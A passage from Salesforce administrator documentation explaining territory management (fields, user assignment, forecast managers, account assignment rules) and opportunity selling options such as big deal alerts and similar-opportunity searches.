Territories related list of a territory detail page.

2. Define the new territory by entering or changing fields. For descriptions of territory fields, see Territory Fields on page
1499.

The required standard fields for territories are Label, Territory Name, and Parent Territory. Territories can also
have custom fields. For more information, see Creating Custom Territory Fields on page 1500.

3. Click Save to finish or Save & New to create more territories.

See Also:
Territory Fields
Creating Custom Territory Fields
Building Your Territory Hierarchy
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Territory Fields
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To edit territories:

A territory has the following fields, listed in alphabetical order.

DescriptionField Name

Sets how much access territory members have to the territory's
accounts: view only, view and edit, or view, edit, transfer and
delete.

Account Access

Sets how much access territory members have to cases on the
territory's accounts, regardless of who owns the cases: no
access, view only, or view and edit.

Case Access

Select this checkbox to prevent the opportunities in this
territory from being moved out of this territory and its child
territories when account assignment rules are run.

Confine Opportunity Assignment

Sets the level of access territory members have to contacts on
the territory's accounts, regardless of who owns the contacts.
The options are no access, view only, or view and edit.

Contact Access

The user to whom forecasts from child and lower-level
territories roll up. Only modifiable by clicking Change on the

Forecast Manager

territory detail page. If enabled via the Territory Settings page,
a forecast manager can administer lower territories in the
hierarchy.

The name used to refer to the territory in any user interface
pages.

Label

Sets how much access territory members have to opportunities
on the territory's accounts, regardless of who owns the
opportunities: no access, view only, or view and edit.

Opportunity Access

Territory immediately above this territory in the territory
hierarchy. The parent territory must be an existing territory.
Use the lookup icon to select the parent territory.

Parent Territory
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DescriptionField Name

Read-only and only displays on the territory detail page. For
every territory, two sharing groups are created; one for the

Sharing Groups

territory, and another for the territory and its children. Click
Territory to see the users who are in the sharing group for a
territory. Click Territory and Subordinates to see the users
who are in the sharing group for a territory and its children.

Note:  Users are listed as group members only when
the group is used in sharing rules or manual record
sharing.

The unique name used by the API and managed packages.
The name must begin with a letter and use only alphanumeric

Territory Name

characters and underscores. The name cannot end with an
underscore or have two consecutive underscores.

A description of the territory.Territory Description

See Also:
Creating Custom Territory Fields
Displaying and Editing Territories
Creating Territories
Territory Management FAQ

Creating Custom Territory Fields

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To create or edit custom territory fields:

You can add up to 500 custom territory fields to tailor territories for your company's unique requirements. To create or edit
custom fields on territories:

From Setup, click Customize > Territories > Fields.
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From this page, you can view details of standard fields, create or edit custom fields, or define field dependencies.

Note:  Territories do not have customizable page layouts. New custom fields are added in alphabetical order at the
bottom of the territory detail page.

See Also:
Displaying and Editing Territories
Creating Territories
Territory Fields

Deleting Territories
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To delete territories:

You can only delete territories that do not have any child territories. When a territory is deleted, the following items are no
longer associated with that territory:

• All users, whether or not Active in Territory is checked

• All accounts, whether assigned manually or by account assignment rules

• All opportunities

To delete a territory:

1. From Setup, click Manage Territories > Hierarchy.
2. Click Del next to a territory in the hierarchy. Alternatively, select the name of a territory and click Delete.

Note: Restoring an account or opportunity from the Recycle Bin restores the territory assignment, but it does not
trigger the evaluation of account assignment rules. If account assignment rules changed while the record was in the
Recycle Bin, the restored record may have territories that are inconsistent with the new rules.

See Also:
Displaying and Editing Territories
Building Your Territory Hierarchy
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Managing Users in Territories
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

AND

“Manage Users”

To assign users to territories:

A territory can have an unlimited number of users, and a user can be assigned to an unlimited number of territories.

In the context of a specific territory, users have both an Active status and an Active in Territory status:

Active

An active user is able to log in to Salesforce.

Deactivated users, such as employees who are no longer with your company, are disabled from logging in to Salesforce.
Deactivated users continue to own opportunities and appear in forecasts and territories. When users are deactivated,
their opportunity forecast overrides, adjusted total overrides, and manager's choice overrides on subordinates' forecasts
are frozen. However, the manager of a deactivated user can apply manager's choice overrides to that user's forecasts.
Rollup amounts are kept current. If a deactivated user is later reactivated, the user can resume normal work as before. If
“Allow Forecasting” is disabled for a user who is deactivated, the user is removed from any territories her or she is assigned
to.

Users can set their active status by modifying their personal information page in their personal settings.

Active in Territory

Users with Active in Territory checked on the territory detail page have open opportunities, closed opportunities,
or no opportunities at all in that territory. Users with Active in Territory deselected have been transferred out of
or removed from the territory, but retain ownership of opportunities in the old territory.

To view the territories to which you belong, view the Territories related list on your personal information page. To view this
related list for any user, from Setup click Manage Users > Users.

Adding Users to Territories

To add users to a territory:

1. From a territory detail page, click Add Users.
2. To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define

your own custom views.
3. Select and deselect checkboxes in the Action column to move users between the Available and Selected areas. Also, you

can:

• Click a letter to view users who correspond to that letter.
• Click All to display all users who match the criteria of the current view.
• Click select shown to move all users that are shown on the current list page to the Selected area below.
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• Click deselect shown or deselect all to move users from the Selected area to the Available area.

Note:  Users already assigned to the territory will not appear in the Available users list even if they meet the list
view criteria.

4. When the Selected area includes all users that you want to assign to the territory, click Assign.

Removing Users from Territories

You can remove a user from a territory and choose who will receive his or her open opportunities:

1. In the Assigned Users related list on the territory detail page, click Remove next to the user's name.

2. Click the New Owner lookup icon ( ) to select a recipient for any open opportunities the user may have.
3. Alternatively, leave the New Owner field blank. One of the following results will occur:

• If the parent territory has a forecast manager, then that forecast manager takes ownership of the user's open opportunities.
Also, the forecast manager is assigned to the territory with Active in Territory unchecked.

• If the parent territory does not have a forecast manager, then the user remains in the territory with Active in
Territory unchecked.

4. Click Save.

If very large amounts of data are affected, you will be sent a confirmation email when the operation has completed.

Transferring Users Between Territories

The user transfer wizard allows you to move a user from one territory to another, choose which open opportunities the user
will continue to own, and designate a recipient for open opportunities the user leaves behind.

To transfer a user to another territory:

1. In the Assigned Users related list on the territory detail page, click Transfer next to the user's name.
2. Click Select next to the territory to which you are transferring the user. If necessary, expand or collapse nodes in the

territory hierarchy to display the desired destination territory.

3. Click the New Owner lookup icon ( ) to select the user who will take ownership of the open opportunities that the
transferred user does not keep. Click Next to proceed.

If you skip this step and choose not to select a recipient, the forecast manager of the parent territory of the user's former
territory automatically receives the open opportunities that the user does not keep. If there is no forecast manager in the
parent territory of the user's former territory, then the user being moved retains ownership of his or her opportunities.

4. Choose a list view of the user's open opportunities.
5. Click Select and Deselect to move opportunities between the Available and Selected areas. Also, you can:

• Click a letter to view opportunities that correspond to that letter.
• Click All to display all opportunities that match the criteria of the current view.
• Click select shown to move all opportunities that are shown on the current list page to the Selected area below.
• Click deselect shown or deselect all to move opportunities from the Selected area to the Available area.

6. When the Selected area shows the opportunities that you want the user to retain after the transfer, click Transfer.

If very large amounts of data are affected, you will be sent a confirmation email when the operation has completed.
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Note:  If you transfer the forecast manager out of a territory, that territory will no longer have a forecast and any
opportunity overrides for that territory that were created by forecast managers above it in the territory hierarchy will
be deleted. See Overriding Customizable Forecasts on page 1204.

See Also:
Displaying and Editing Territories
Adding Forecast Managers to Territories

Viewing Assigned Users Lists
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view assigned users:

“Manage Territories”

AND

“Manage Users”

To remove or transfer a user:

The assigned users list page displays a list of users assigned to the selected territory. From this page, you can view detailed user
information, remove users from territories, transfer users between territories, and access other related information.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. The default View is your last selected user view.

• Click a username to view the user detail.

• Click Remove next to a username to remove the user from the territory.

• Click Transfer next to a username to transfer the user between territories.

See Also:
Territory Management Overview
Managing Account Assignment Rules
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Adding Forecast Managers to Territories
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Manage Territories”

AND

“Customize Application”

To assign forecast managers to territories:

Consider the following before assigning the forecast manager for a territory:

• A territory can have only one forecast manager. See Assigning Forecast Managers in Your Forecast Hierarchy on page 1590.

• Forecasts from child and lower-level territories roll up to forecast managers.

• If a territory has no forecast manager, there is no forecast for that territory.

• Forecast managers can receive opportunities when users are transferred out of or removed from a territory.

• Forecast managers can receive opportunities when account assignment rules are run.

• On the territory settings page, you can enable forecast managers to act as delegated administrators for territories below
them in the hierarchy.

To assign or change the forecast manager for a territory:

1. On the territory detail page, click Change next to the Forecast Manager field.
2. Select a name from the drop-down list to specify the territory's forecast manager.

On the right, a tree view of the territory hierarchy allows you to see the child and lower-level territories whose forecasts
will roll up to the forecast manager.

3. Click Save to finish.

See Also:
Assigning Forecast Managers in Your Forecast Hierarchy
Displaying and Editing Territories
Configuring Territory Management Settings
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Managing Account Assignment Rules
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To manage account assignment rules:

You can create account assignment rules that automatically move accounts and their associated opportunities and cases into
territories based on any standard or custom account field, such as zip code, state, industry, revenue, or number of employees.
Each rule consists of multiple rows of criteria that specify exactly how the accounts are assigned.

Account assignment rules are governed by the following:

• A territory can have inherited account assignment rules, meaning that the rules were created somewhere higher in the
territory hierarchy and consequently also impact the given territory.

• A territory can have locally defined account assignment rules, meaning that the rule was created at the given territory.

• If a territory doesn't have any inherited or locally-defined account assignment rules, then it only contains accounts that
were manually added.

• If an account matches all inherited and locally-defined account assignment rules for multiple territories on the same branch
of the hierarchy, then the account is assigned to the lowest matching territory.

• If an account matches a territory's inherited account assignment rules but not all of the territory's locally-defined rules,
then the account isn't assigned to the territory, but is evaluated for child territories.

For example, you have three territories:

• Territory A has four rules marked “Apply to child territories“, and is a parent of territory B.

◊ Territory B has three rules not marked “Apply to child territories”, and is a parent of territory C.

- Territory C has two rules.

If you assign an account that matches all of territory A’s and territory C’s rules but only one of territory B’s rules, then the
account is assigned to territory C. However, if territory B's rules are marked “Apply to child territories,” then the account is
assigned only to territory A.

Working with Account Assignment Rules

Click Run Rules on the territory detail page to evaluate the active inherited, locally defined rules shown on the page against
all existing accounts in your organization. The rules for all subordinate territories are also evaluated—that is, when you run
rules on the top-level territory, all rules in the entire hierarchy are evaluated. When you click Run Rules, an icon ( ) displays
next to the button for all affected territories to indicate that rules are being processed. An email confirmation is sent when
processing is complete.
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Note:  To protect data quality, you can't modify a territory while the processing icon displays.

Click Manage Rules on the territory detail page to access the Manage Account Assignment Rules page, where you can create,
edit, preview, and run account assignment rules:

• Click New to create a new rule, or Edit to edit an existing rule. See Creating and Editing Account Assignment Rules on
page 1511.

• Use the Active checkbox to set a locally-defined rule as active or inactive.

Active account assignment rules automatically evaluate accounts and assign them to territories when:

◊ An account is created using the Salesforce user interface, the Force.com API, or a client such as Connect Offline.
◊ An account is imported using an import wizard.
◊ An account is created by the conversion of a lead.
◊ An account is edited and saved if the Select by default checkbox is selected for the “Evaluate this account

against territory rules on save” checkbox option under Layout Properties. If the account assignment
rule initiates an opportunity ownership change, you must have transfer access on the opportunity.

◊ An account is edited and saved via the Force.com API.
◊ Run Rules is clicked on a territory detail page, provided the Exclude from territory assignment rules

checkbox on the account is deselected.
◊ Save & Run Rules is clicked on the manage account assignment rules page for a territory, provided the Exclude

from territory assignment rules checkbox on the account is deselected.
◊ Duplicate accounts are merged.

• Click a rule name to see the details of that rule, including its active status and criteria. From a rule detail page you can edit,
delete, or clone a rule.

• Click Preview to see the accounts that would be assigned to this territory and its child territories if the rules currently
marked active were run. See Previewing Account Assignments on page 1512.

• Click Save to save the current active status of locally-defined rules.
• Click Save & Run Rules to save the current active status of locally-defined rules and evaluate the inherited and

locally-defined rules shown on the page against all existing accounts in your organization. Running account assignment
rules affects accounts in the Recycle Bin.

Click Edit on the territory detail page to toggle the Confine Opportunity Assignment checkbox. When it is selected,
the territory's opportunities remain in the territory or its child territories when you run account assignment rules. The following
exceptions apply:

• If an opportunity's account moves to only one of the territory's children, then the opportunity follows the account and is
reassigned to the account's new territory. This includes when an account moves to multiple territories and only one of the
new territories is a child of the original territory.

• If an opportunity's account moves to more than one of the territory's children, then the opportunity's territory field is set
to blank.

• If an opportunity's account moves completely out of the territory and its children, then the opportunity's territory field is
set to blank.

Tip:  You can also manage account assignment rules using the Data Loader or the Web services API.

Account Assignment Rules and Opportunities

Several factors determine how account assignment rules assign opportunities to territories, including:
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• Whether the account associated with the opportunity is assigned to one or more territories
• Whether the opportunity owner is a member of the same territory as the account
• The number of users assigned to the territory
• Whether a forecast manager is assigned to the territory

Note:  If you’re updating an account which triggers an account assignment rule that is part of territory management,
you must have transfer access on the opportunity if the account assignment rule initiates a change in the opportunity
ownership.

Accounts with One Territory

If the account associated with the opportunity is assigned to only one territory, use the following table to determine how the
opportunity's territory is assigned:

ResultsA Forecast Manager is
Assigned to the Territory

Number of Users
Assigned to Territory

Opportunity
Owner Belongs to
Same Territory as
Account

The opportunity is assigned to the same territory
as the account. The opportunity owner is
unchanged.

N/A1Yes

The opportunity is assigned to the same territory
as the account and the opportunity owner is the
sole member of the territory.

N/A1No

The opportunity is assigned to the same territory
as the account and the opportunity owner is added

N/A0No

as an inactive member of the territory. The owner
of the opportunity remains unchanged.

The opportunity is assigned to the same territory
as the account and the forecast manager becomes
the opportunity owner.

Yes>1Yes

The opportunity is assigned to the same territory
as the account. The owner of the opportunity

No>1Yes

remains unchanged if the opportunity owner has
Active in Territory selected on the territory
detail page.

The opportunity is assigned to the forecast
manager of the territory.

Yes>1No

The opportunity is assigned to the same territory
as the account and the opportunity owner is added

No>1No

as an inactive member of the territory. The owner
of the opportunity remains unchanged.

Accounts with Multiple Territories

If the account associated with the opportunity is assigned to more than one territory, use the following table to determine how
the opportunity's territory is assigned:
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ResultsOpportunity Owner's Territory Membership

The opportunity is not assigned to any territories.
The opportunity owner can assign the opportunity

Opportunity owner has one territory in common with the account

to the territory that he or she has in common with
the account.

The opportunity is not assigned to any territories.
The opportunity owner can assign the opportunity

Opportunity owner has more than one territory in common with the
account

to any territory that he or she has in common with
the account.

The opportunity is not assigned to any territories.
The opportunity owner cannot assign the
opportunity to any territories.

Opportunity owner has no territories in common with the account

Territory Assignments for Standard Users

If the user creating the opportunity is a standard user, Salesforce automatically assigns a territory to a new opportunity only if
the user and account have exactly one territory in common. For example, James, who is a standard user assigned to the Westlake
territory only, creates an opportunity on the Filmore, Inc. account. Filmore, Inc. belongs to the Westlake territory and one
other territory. Because James and Filmore, Inc., have exactly one territory in common, the new opportunity is assigned to
the Westlake territory. If James belonged to the account's other territory, the opportunity would not be assigned to a territory.

Use the following table to determine when a territory will be assigned to an opportunity created by a standard user.

ResultsOpportunity
Owner Belongs to
Same Territory as
Account

Number of
Territories
Assigned to
Account

Number of Territories
Assigned to User

The opportunity is assigned to the territory in
common.

Yes11

The opportunity is assigned to the account's
territory if the user belongs to that same territory.

Yes1>1

The opportunity is assigned to the user's territory
if the account is associated with that same
territory.

Yes>11

The opportunity is not assigned to any territories.
The opportunity owner can assign the opportunity

Yes>1>1

to any territory that he or she has in common with
the account.

The opportunity is not assigned to any territories.NoN/AN/A

Territory Assignments for Administrators

A user who is an administrator or has “Manage Territories” permission can view all territories.

If the user is an administrator, a territory-delegated administrator, or a user with the “Manage Territories” permission, Salesforce
automatically assigns a territory to a new opportunity only if the administrator, the account, and the account's parent accounts
have exactly one territory in common. For example, Jennifer is an administrator who manages the Northlake and Westlake
territories. She creates an opportunity on the Richmond Brothers account. Richmond Brothers is associated with the Northlake
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and Southlake territories. Richmond Brothers has one parent account, Zyman Products, which is assigned to the Northlake
and Eastlake territories. Because Jennifer, Richmond Brothers, and Zyman Products have only the Northlake territory in
common, the new opportunity is assigned to the Northwest territory. If Richmond Brothers or Zyman Products also belonged
to the Westlake territory, the opportunity would not be assigned to a territory.

Use the following table to determine when a territory will be assigned to an opportunity created by an administrator.

ResultsOpportunity
Owner Manages
Same Territory as
Account and
Parent Account(s)

Number of
Territories
Assigned to
Account's Parent
Account(s)

Number of
Territories
Assigned to
Account

Number of
Territories
Administrator
Manages

The opportunity is assigned to the territory in
common.

Yes111

The opportunity is assigned to the territory in
common.

Yes11>1

The opportunity is assigned to the territory in
common.

Yes1>11

The opportunity is assigned to the territory in
common.

Yes>111

The opportunity is assigned to the parent
account's territory if the administrator and the

Yes1>1>1

account have no other territories in common.
The opportunity owner can manually assign
the opportunity to any territory that he or she
has in common with the account

The opportunity is assigned to the
administrator's territory if the account and the

Yes>1>11

account's parent account(s) have no other
territories in common. The opportunity owner
can manually assign the opportunity to any
territory that he or she has in common with
the account

The opportunity is assigned to the account's
territory if the administrator and the account's

Yes>11>1

parent account(s) have no other territories in
common. The opportunity owner can manually
assign the opportunity to any territory that he
or she has in common with the account

The opportunity is assigned to the
administrator's territory if the administrator,

Yes>1>1>1

the account, and the account's parent account(s)
have no other territories in common. The
opportunity owner can manually assign the
opportunity to any territory that he or she has
in common with the account.
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ResultsOpportunity
Owner Manages
Same Territory as
Account and
Parent Account(s)

Number of
Territories
Assigned to
Account's Parent
Account(s)

Number of
Territories
Assigned to
Account

Number of
Territories
Administrator
Manages

The opportunity is not assigned to any
territories.

NoN/AN/AN/A

See Also:
Creating and Editing Account Assignment Rules
Previewing Account Assignments
Displaying and Editing Territories
Assigning Opportunities to Territories

Creating and Editing Account Assignment Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To create or edit account assignment rules:

A territory can have a maximum of 15 account assignment rules, including both active and inactive rules. To create or edit an
account assignment rule:

1. From Setup, click Manage Territories > Hierarchy.
2. Select the territory you want to modify.
3. Click Manage Rules in the Account Assignment Rules related list.
4. Click New to create a new account assignment rule. To edit an existing account assignment rule, click Edit.
5. Enter a name for the rule. Rule names must be unique and can have a maximum of 80 characters.
6. Define filter criteria that accounts must match to be included in the territory.

If your organization uses multiple languages, use your organization's default language when specifying your criteria.

7. Optionally, check the Apply to child territories box that makes the rule applicable to child territories
8. Optionally, check the Active box to activate the rule. Inactive rules never run.

Active account assignment rules automatically evaluate accounts and assign them to territories when:
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• An account is created using the Salesforce user interface, the Force.com API, or a client such as Connect Offline.
• An account is imported using an import wizard.
• An account is created by the conversion of a lead.
• An account is edited and saved if the Select by default checkbox is selected for the “Evaluate this account

against territory rules on save” checkbox option under Layout Properties. If the account assignment
rule initiates an opportunity ownership change, you must have transfer access on the opportunity.

• An account is edited and saved via the Force.com API.
• Run Rules is clicked on a territory detail page, provided the Exclude from territory assignment rules

checkbox on the account is deselected.
• Save & Run Rules is clicked on the manage account assignment rules page for a territory, provided the Exclude

from territory assignment rules checkbox on the account is deselected.
• Duplicate accounts are merged.

9. Click Save to finish, or Save & New to save the rule and begin defining another rule.

Tip:  By creating at least one account assignment rule at the top of your territory hierarchy that applies to child
territories, you can build a hierarchy where all accounts match the top-level criteria and subordinate territories
differentiate accounts by more specific criteria.

Similarly, if your organization uses divisions, create a rule at the top of your territory hierarchy that filters accounts
by division and applies to child territories.

See Also:
Managing Account Assignment Rules
Previewing Account Assignments
Displaying and Editing Territories

Previewing Account Assignments

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To preview account assignments in territories:

Before running account assignment rules, preview a list of the accounts that would be assigned to the territory and territories
below it in the territory hierarchy if the rules currently marked active were run:
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1. From the territory detail page, click Manage Rules > Preview.
2. Click Save to save the active status of the rules. Click Save & Run Rules to save the active status of the rules and evaluate

the rules against all existing accounts in your organization.

Note:  Running account assignment rules affects accounts in the Recycle Bin.

See Also:
Managing Account Assignment Rules
Creating and Editing Account Assignment Rules
Displaying and Editing Territories

Viewing Inherited Rules Lists
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view inherited rules:

The inherited rules list page displays a list of account assignment rules inherited by the selected territory. From this page, you
can view detailed rule information and access information on individual rules.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.

• Click a rule name to view the rule detail.

See Also:
Territory Management Overview
Manually Assigning Accounts to Territories
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Manually Assigning Accounts to Territories
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

AND

“Edit” on accounts

OR

You are a forecast manager, Forecast managers can
manage territories is selected, you are working below
your position in the territory hierarchy, and you have “Edit”
on accounts.

To manually add accounts to territories:

As an alternative to creating and running account assignment rules, you can add accounts to territories manually:

1. On the territory detail page, click Add Accounts on the Manually Assigned Accounts related list.
2. Choose a view from the drop-down list, or click Create New View to build a new custom view.
3. Click Select and Deselect to move accounts between the Available and Selected areas. Also, you can:

• Click a letter to view accounts that correspond to that letter.
• Click All to display all accounts that match the criteria of the current view.
• Click select shown to move all accounts that are shown on the current list page to the Selected area below.
• Click deselect shown or deselect all to move accounts from the Selected area to the Available area.

4. When the accounts in the Selected area includes all accounts that you want to manually add to the territory, click Assign.

Note:  Manually adding accounts and running account assignment rules are completely independent. A manually
added account remains in a territory until it is manually removed. There is nothing to prevent assignment rules also
adding the account to the territory.

See Also:
Displaying and Editing Territories
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CUSTOMIZING OPTIONS FOR SELLING

Restricting Price and Quantity Editing on Opportunity
Products

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To restrict price and unit editing:

To ensure that opportunity products use the price from the associated price book, remove the Sales Price field from the
opportunity products page layout.

To use a quantity of one for all opportunity products, remove the Quantity field from the opportunity products page layout.

Note:  If you cannot remove these fields from the page layout, contact salesforce.com to enable this option.

See Also:
Automatically Activating Product Prices

Customizing Big Deal Alerts
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To activate big deal alerts:

Your organization can use alerts that automatically send an email notification for opportunities with large amounts. Customize
this alert to send an email when an opportunity reaches a threshold. Your threshold consists of an opportunity amount and
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probability. For example, you may want to send an email to your team that an opportunity of $500,000 has reached a probability
of 90%.

See Also:
Activating Big Deal Alerts

Activating Big Deal Alerts
You can activate one opportunity alert for your organization. The alert message resembles the opportunity detail page including
the page layout and language from a selected user. Before you begin, you may want to decide which user has the page layout
and language settings that you would like included in all alerts. This user must also have the “View All Data” permission.

1. From Setup, click Customize  > Opportunities  > Big Deal Alert.
2. Enter a name for the alert.
3. Enter a Trigger Probability and Trigger Amount in the corporate currency. An opportunity alert is triggered for

opportunities with this probability and amount or greater. The alert triggers only for those opportunities that meet both
the trigger probability and trigger amount threshold settings.

Note:  An opportunity can trigger a big deal alert even if it is in a currency that is different from the corporate
currency. The Amount on an opportunity is converted to corporate currency and compared to the Trigger
Amount. If you are using advanced currency management, dated exchange rates will be used.

4. Check the Active box if you would like to activate the new alert immediately after you save.
5. Enter the From Email Name.
6. Enter the From Email Address.
7. Select a user that provides the appropriate opportunity page layout, language, and currency settings for the content of the

emails. This user must have the “View All Data” permission.

For organizations that use multiple currencies, all alerts include the amount in the currency of the opportunity. If the
opportunity currency is different than the currency of the user selected in this step, both currencies are included in the
email.

Enter a list of email recipients separated by commas. You can also include CC: and BCC: recipients but all must be valid
email addresses.

The BCC: field is not available if your organization has enabled compliance BCC emails.

8. Check the Notify Opportunity Owner box if you would like to include the owner of the opportunity in the alert
emails.

9. Click Save.

Note:  An opportunity alert sends a notification the first time an opportunity reaches the threshold. So, an opportunity
that reaches the threshold with 90% probability will not trigger additional alerts if the probability subsequently goes
higher. However, an opportunity that already triggered an alert and then fell below the threshold can trigger a second
alert if it crosses that threshold again.
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When working remotely in Connect Offline, you can make changes to opportunities that trigger alerts. These alert
messages will be sent when you update your data.

See Also:
Customizing Big Deal Alerts

Enabling Opportunity Update Reminders
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application” OR “Manage Users”To enable opportunity update reminders:

“Manage Users”To activate or deactivate opportunity update reminders:

Updated and accurate opportunities drive precise forecasts. Ensure that your opportunities are up to date by enabling managers
to schedule opportunity update reminders—automated opportunity reports that managers can customize for their teams. For
example, a manager can schedule a weekly report of all the opportunities for the current fiscal quarter owned by anyone on
the team and have the report distributed to everyone on the team.

1. From Setup, click Customize > Opportunities > Update Reminders.
2. Click Edit.
3. Select Enable Update Reminders for My Organization. Deselect it to disable the feature.
4. Optionally, select Automatically Activate Reminders for Users with Direct Reports to schedule

opportunity update reminders for all users who have direct reports.

Note:  Partner and customer portal users assigned Executive roles are considered direct reports of their account
owners. If an account owner is activated to receive opportunity update reminders, partner and customer portal
users assigned as Executives to the account receive opportunity update reminders, even if they don’t have access
to the opportunity. To avoid reminders being sent to these users, remove them from the Executive role.

5. Click Save.
6. Select the boxes next to the users you want to activate, then click Activate. Optionally, check the box in the column header

to select all currently displayed items. Activated users can schedule opportunity update reminders. Any user that has direct
reports can be activated. To deactivate users, select them and click Deactivate.

See Also:
Prompting for Products on Opportunities
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Enabling and Configuring Similar Opportunities
Available in: Enterprise, Unlimited, Developer Editions

User Permissions Needed

“Customize Application”To enable similar opportunities:

The Similar Opportunities feature allows users to find Closed/Won opportunities that match the attributes of an opportunity
they're currently viewing, and add them to the Similar Opportunities related list on that opportunity's record. Enable and
configure this feature so your users can quickly access information about past opportunities that may be helpful for the deals
they're currently working on. You can also modify the search criteria that Salesforce uses to identify similar opportunities and
the opportunity record fields that are displayed in the Similar Opportunities related list.

1. From Setup, click Customize > Opportunities > Similar Opportunities.
2. Click Edit.
3. Select Enable Similar Opportunities to add the Similar Opportunities related list to opportunity detail pages.
4. Select three to ten opportunity fields or related lists that you want Similar Opportunities searches to match against, and

then click Add. Use CTRL+click to select multiple items individually or SHIFT+click to select a range of items.

Note: A Similar Opportunities search is an OR search, so Closed/Won opportunities that contain any of the
specified attributes are matches. The more search criteria you select, the more similar opportunities will be identified
in a search.

5. Select up to 15 opportunity fields to display in the Similar Opportunities related list. The selected fields appear in the list
as columns, which you can arrange using the Top, Up, Down, and Bottom arrows.

Important:  When deciding which opportunity fields to display, consider that users can see all of the information
that is displayed in a Similar Opportunities related list, even if the list includes records that aren't ordinarily
accessible because of sharing rules and permissions.

6. Click Save.
7. Add the Similar Opportunities related list to the opportunity page layout.

See Also:
Understanding Similar Opportunities Searches
Using Opportunities
Finding Similar Opportunities
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Understanding Similar Opportunities Searches
Available in: Enterprise, Unlimited, Developer Editions

A Similar Opportunities search finds Closed/Won opportunities that match attributes of the current opportunity.

When enabling Similar Opportunities, you select the attributes that Salesforce uses as search criteria for identifying similar
opportunities. You can select three to ten opportunity fields or related lists.

When users search for similar opportunities, Salesforce finds a maximum of 10,000 matching Closed/Won opportunities in
a 3 month period—starting with the oldest records first—and displays up to 300 of the most relevant opportunities. A
Closed/Won opportunity's relevance is determined by the number of attributes that match the current opportunity.

A Similar Opportunities search is an OR search, so Closed/Won opportunities that contain any of the specified attributes are
matches. The more search criteria you select, the more similar opportunities will be identified in a search. If there are more
than 10,000 matching Closed/Won opportunities, some of the most recent records won't be included in the Similar
Opportunities related list, even if they are highly relevant.

Tip:  The best way to ensure that Similar Opportunities searches find current matching records, especially if your
organization has a large number of Closed/Won opportunities, is to define the smallest set of search criteria possible.

See Also:
Enabling and Configuring Similar Opportunities
Defining Similar Opportunities Search Criteria

Defining Similar Opportunities Search Criteria
Available in: Enterprise, Unlimited, Developer Editions

If your organization uses the Similar Opportunities feature, you need to select the opportunity fields or related lists that are
used as search criteria.

You can use these standard fields and related lists.

Standard Related ListsStandard Fields

CompetitorsAccount Name

Contact RoleClose Date

PartnerLead Source

ProductsOpportunity Owner

Opportunity TeamPrimary Campaign Source

Private
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Standard Related ListsStandard Fields

Probability (%)

Quantity

Type

You can also select any custom opportunity field, except those with these field types.

• Auto-number
• Currency
• Formula
• Picklist (multi-select)
• Roll-up summary
• Text (encrypted)
• Text area

See Also:
Enabling and Configuring Similar Opportunities
Understanding Similar Opportunities Searches

Prompting for Products on Opportunities
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To enable prompting for products:

Customize Salesforce to prompt users to select a product when creating an opportunity. Enabling this option makes it easier
for users to add products while creating an opportunity.

1. From Setup, click Customize  > Opportunities  > Settings.
2. Check Prompt users to add products to opportunities to have Salesforce prompt users to select a product

when creating an opportunity.
3. Click Save.
4. We recommend making the Amount field on the opportunity read only to ensure your opportunity amounts are driven

from the products on the opportunity.
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Note:  If enabled, replaces the Save button with a Save & Add Product button the opportunity creation page.

See Also:
Products, Price Books, and Schedules Overview

Automatically Activating Product Prices
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To auto-activate product prices:

When you deactivate a product, you may want all related prices for that product automatically de-activated as well. Likewise,
if you activate a product, you can have all the prices for that product automatically activated.

1. From Setup, click Customize  > Products  > Settings.
2. Check When changing active flag on a product... to have Salesforce automatically change the active flag on

all related prices to whatever the active flag is on the related product.

Leave this field unchecked if you want related prices to remain the same status whenever users activate or deactivate a
product.

3. Click Save.

See Also:
Products, Price Books, and Schedules Overview

Using Product Families
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To edit product families:

Use the Product Family picklist to categorize your products. For example, if your company sells both hardware and software,
you can create two product families: Hardware and Software.
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If your organization has customizable forecasting, your users can have a different quota for hardware sales and software sales.
Users can also view forecasts for opportunities with hardware products separate from opportunities that include software
products.

To begin using product families:

• Customize the Product Family picklist to include the different categories of products you sell.

• For each product in your price books, edit the product and select the appropriate Product Family value.

• If your organization has customizable forecasting, set a different quota for each product family for your users.

• If your organization has customizable forecasting, consider changing your forecast settings to display a particular forecast
family value by default when your users click the Forecasts tab.

See Also:
Products, Price Books, and Schedules Overview

Setting Up Product Schedules
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

